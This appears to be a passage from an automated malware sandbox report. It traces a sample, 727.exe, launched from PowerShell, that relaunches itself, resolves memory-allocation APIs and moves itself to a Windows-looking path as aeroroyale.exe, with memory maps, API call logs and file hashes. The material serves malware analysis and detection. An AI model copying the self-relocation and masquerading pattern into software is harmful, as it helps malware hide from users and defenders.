| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\727.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 |
Thread 0xbcc
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe, show_window = SW_SHOWNORMAL |
|
1 |
Process #4: 727.exe
17
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\727.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd0 |
| Parent PID | 0xa54 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002b4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002f5fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0113ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x01155fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x011f0000 | 0x014befff | Memory Mapped File | r |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xbd4
17
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x77170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 |
Process #5: 727.exe
21
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\727.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:41, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xbd0 (c:\users\bgc6u8~1\appdata\local\temp\727.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
BEC
0x
BF0
0x
BF4
0x
C00
0x
C04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x00205fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00225fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00251fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00380000 | 0x003dbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00381fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x003a0000 | 0x003a3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x003a0000 | 0x003a3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x003b0000 | 0x003cffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x003e0000 | 0x003e3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x004f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x012eefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012f0000 | 0x012f0000 | 0x012f1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01300fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01301fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01320000 | 0x015eefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000015f0000 | 0x015f0000 | 0x016effff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x016f0000 | 0x0171ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01720000 | 0x01785fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000017d0000 | 0x017d0000 | 0x0180ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001810000 | 0x01810000 | 0x0190ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001910000 | 0x01910000 | 0x01d02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x0200ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 152.00 KB |
MD5:
09825e3594c3b843b89e84650c05582b
SHA1: 0a9e192aa88a331cfa239c7dfba3d768fd76527c SHA256: 46a07c4a907ba444e952dde338443fda6cb0d52202d1f07c916114c38ca9629f SSDeep: 1536:7keo251Lv766vt7QtQwpl8FnKXXKnwgT4m2V9AadfIpZYKpOovk4xKLZT5:AeljLDP1syI0KHji4m25dwESvtMdT5 |
|
|
Threads
Thread 0xbe0
21
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x77170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe, size = 260 |
|
1 | |
| File | Move | source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe, destination_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe |
|
1 | |
| System | Get Time | type = Ticks, time = 154019 |
|
1 |
Process #6: aeroroyale.exe
17
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:01:41, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf8 |
| Parent PID | 0xbdc (c:\users\bgc6u8~1\appdata\local\temp\727.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00390fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003b4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003e5fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rwx |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00555fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01210000 | 0x014defff | Memory Mapped File | r |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xbfc
17
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x77170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 |
Process #7: aeroroyale.exe
169
60
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc08 |
| Parent PID | 0xbf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
